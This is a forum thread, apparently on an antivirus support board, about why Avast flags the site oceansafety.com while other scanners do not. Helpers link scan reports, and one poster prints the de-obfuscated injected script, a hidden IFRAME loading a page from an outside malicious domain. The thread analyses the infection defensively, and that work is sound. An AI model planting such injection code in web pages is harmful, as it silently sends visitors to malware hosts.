website only being seen as malicious by avast ?

[rikatdmi]

I cannot load xww.oceansafety.com avast blocks the site as it did have a trojhan over a week ago.  Yet on my laptop which has security essentials I have no problem, and have run a multi site virus checker site which reports over 30 scanners as it being clean ?

[DavidR]

Avast isn't alone in this detection, not many even scan for this type of thing (injected javascript script) much less detect it. I captured what was being alerted on and uploaded to virustotal 40+ scanners, https://www.virustotal.com/file/6c07d3be684799ed833607537a46d55cc49b2b9ff564cc14b3d4e339659c9dbe/analysis/1360604370/.

http://www.urlvoid.com/scan/oceansafety.com/

[rikatdmi]

thats great, but means little to me, so am I not safe with my other virus scanner, or is this a false result from avast ?

[Pondus]

avast is often the first one to detect website infections

scan of oceansafety.com.htm
https://www.virustotal.com/nb/file/e4982dbb464545f60ba2b953d7651d424affa454c94ddc5fae142efa159d98ea/analysis/1360857226/

First seen by VirusTotal
 2013-02-14 15:53:46 UTC ( 1 minutt ago )

[polonus]

obfuscated code on line 169 de-obfuscated translates to

Code: [Select]

<  sc​ript type='text/javascript'> < !-- var msg=314,d=document; eval(un​escape (' window.status='Done'; d.write('<IFRAME name=49c src*=\'htxp://enuarutranslate.com/dev/banner.php\' width=581 height=23 style=\'display: none\'></IFRAME>')') ); //--> < / sc​ript >   
src*  alerted here as ET CURRENT_EVENTS TDS Sutra - request in.cgi see: http://urlquery.net/report.php?id=980188

polonus